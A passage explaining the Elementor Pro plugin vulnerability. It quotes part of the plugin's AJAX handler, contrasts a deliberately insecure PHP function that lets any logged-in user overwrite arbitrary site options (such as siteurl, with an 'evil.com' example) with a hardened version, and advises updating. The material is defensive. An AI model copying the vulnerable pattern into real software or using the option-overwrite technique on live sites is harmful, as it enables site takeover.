 * Verify ajax nonce, and run all the registered actions for this request.
 *
 * Fired by `wp_ajax_elementor_ajax` action.
 *
 * @since 2.0.0
 * @access public
 */
public function handle_ajax_request() {
   if ( ! $this->verify_request_nonce() ) {
      $this->add_response_data( false, esc_html__( 'Token Expired.', 'elementor' ) )
         ->send_error( Exceptions::UNAUTHORIZED );
   }
   ...
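To make the root cause concrete, here is an added illustration (not Elementor's code and not its actual 3.11.7 patch) of the vulnerable handler shape quoted above next to one way of hardening it: a capability check, an allowlist of option names the feature is meant to touch, and type enforcement on the value. `current_user_can()`, `manage_woocommerce`, `sanitize_key()`, `absint()`, `get_post_type()` and `update_option()` are standard WordPress/WooCommerce APIs; the allowlist contents are an assumption for the example.

```php
<?php
// Added example, not Elementor's code or its actual fix.

/**
 * Vulnerable shape (as in the quoted module.php): any authenticated user who can
 * reach the elementor_ajax endpoint and pass the nonce check can write ANY option,
 * because the nonce proves only that the request came from a logged-in session,
 * not that the caller is allowed to change site configuration.
 */
function vulnerable_update_page_option( $data ) {
    update_option( $data['option_name'], $data['editor_post_id'] );
}

/**
 * Hardened version. Returns true on success, false when the request is rejected.
 */
function hardened_update_page_option( array $data ) {
    // 1. Authorization: only shop managers / administrators may change WooCommerce pages.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        return false;
    }

    // 2. Allowlist (assumed for this example): the WooCommerce page-ID options the
    //    editor feature needs. siteurl, admin_email, default_role etc. are unreachable.
    $allowed = [
        'woocommerce_shop_page_id',
        'woocommerce_cart_page_id',
        'woocommerce_checkout_page_id',
        'woocommerce_myaccount_page_id',
    ];
    $option_name = isset( $data['option_name'] ) ? sanitize_key( $data['option_name'] ) : '';
    if ( ! in_array( $option_name, $allowed, true ) ) {
        return false;
    }

    // 3. Type enforcement: the value must be the ID of an existing page, never a
    //    free-form string such as "https://evil.com".
    $post_id = isset( $data['editor_post_id'] ) ? absint( $data['editor_post_id'] ) : 0;
    if ( 0 === $post_id || 'page' !== get_post_type( $post_id ) ) {
        return false;
    }

    return update_option( $option_name, $post_id );
}
```

The three checks are independent: even if the allowlist were later widened by mistake, the capability check still keeps subscribers and customers out, and the integer cast alone already defeats the siteurl redirect shown in Bruandet's MariaDB output.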

Anyone using Elementor Pro should ensure they’re running 3.11.7 or later, as all previous versions are vulnerable. It’s also a good idea for these users to check their sites for the signs of infection listed in the PatchStack post.

Source: https://arstechnica.com/information-technology/2023/03/hackers-exploit-wordpress-plugin-flaw-that-gives-full-control-of-millions-of-sites